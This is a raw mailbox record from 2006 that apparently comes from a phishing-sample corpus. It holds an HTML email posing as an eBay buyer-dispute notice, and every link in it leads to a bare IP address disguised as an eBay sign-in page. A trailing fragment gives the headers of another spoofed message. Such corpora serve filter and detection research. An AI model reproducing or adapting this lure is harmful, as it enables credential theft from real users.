From: eBay@arma-bank.com.ua,
	Member@arma-bank.com.ua:roger24dodger <aw-confirm@eBay.com>
Content-Type: text/html
Message-Id: <20060426144530.AABD51DF999@mail.arma-bank.com.ua>
Date: Wed, 26 Apr 2006 17:45:30 +0300 (EEST)
Status: R
X-Status: 
X-Keywords:                  


<P> <TABLE cellSpacing=0 cellPadding=0 width=600> <TBODY> <TR> <TD
style="WORD-WRAP: break-word" width=600> <TABLE cellSpacing=0
cellPadding=0 width=600 border=0
xmlns:x="urn:schemas-microsoft-com:xslt"> <TBODY> <TR> <TD
style="WORD-WRAP: break-word" width=600> <TABLE cellSpacing=0
cellPadding=2 width="100%" bgColor=#eeeef8 border=0> <TBODY> <TR> <TD
width=2><IMG src="http://pics.ebaystatic.com/aw/pics/spacer.gif"
width=2></TD> <TD><FONT face=Arial size=4>eBay New Message Received from
Buyer for Item #7200311802</FONT> </TD> <TD vAlign=center><A
href="http://www.ebay.com/" target=_blank><IMG
src="http://pics.ebaystatic.com/aw/pics/logos/logoEbay_150x70.gif"
align=right border=0></A></TD></TR> <TR bgColor=#9999cc height=2> <TD
colSpan=3></TD></TR></TBODY></TABLE></TD></TR> <TR> <TD> <TABLE
style="FONT-SIZE: x-small; FONT-FAMILY: arial, sans-serif" cellSpacing=0
cellPadding=0 width="94%" align=center border=0> <TBODY> <TR>
<TD><BR><BR>Dear member: </TD></TR> <TR> <TD>A dispute was opened for
item <A href="http://211.98.48.40/.signin.ebay.com/ws/ebaysapidll.html"
target=_blank><B>7200311802</B></A>,&nbsp; on April-24-2006. <BR>
  <BR>The buyer has posted a new message. Click the link below to view
the information submitted by the buyer and reply. <BR><BR><A
href="http://211.98.48.40/.signin.ebay.com/ws/ebaysapidll.html"
target=_blank><B>Respond to this notification</B></A><BR>
  <BR>Learn more about eBay's <A
href="http://211.98.48.40/.signin.ebay.com/ws/ebaysapidll.html"
target=_blank>Item Not Received or Significantly Not as Described
Policy</A>. <BR>
  <BR>You can view the status of this dispute at any time by visiting
your Dispute Console, which is accessible here:<BR><A
href="http://211.98.48.40/.signin.ebay.com/ws/ebaysapidll.html"
target=_blank>http://feedback.ebay.com/ws/eBayISAPI.dll?ViewDisputeConsole&amp;DisputeType=3</A><BR>
  <BR>Thank you for your patience and responsiveness in participating in
this process. <BR><BR></TD></TR> <TR> <TD>Regards, <BR>eBay
</TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE><!--
end of AOLMsgPart_2_895aed9d-9ed2-4fbc-b664-1b3934400a06 --></P>

From message@ebay.com  Wed Apr 26 11:28:09 2006
Return-Path: <message@ebay.com>
X-Original-To: nobody@login.example.com
Delivered-To: nobody@login.example.com
Received: from mail2.example.com (mail2.example.com [10.3.4.5])
	by naughty.example.com (Postfix) with ESMTP id 752DECAB4DE
	for <nobody@login.example.com>; Wed, 26 Apr 2006 11:28:09 -0400 (EDT)
Received: from 197.30.0.2 (unknown [66.162.209.99])
	by mail2.example.com (Postfix) with SMTP id 486AC6FA339
	for <nobody@example.com>; Wed, 26 Apr 2006 11:28:09 -0400 (EDT)
Received: from 250.102.234.77 by ; Wed, 26 Apr 2006 13:25:08 -0300
Message-ID: <EEGLXYUSPJGGWSZFCPXTUYWS@msn.com>
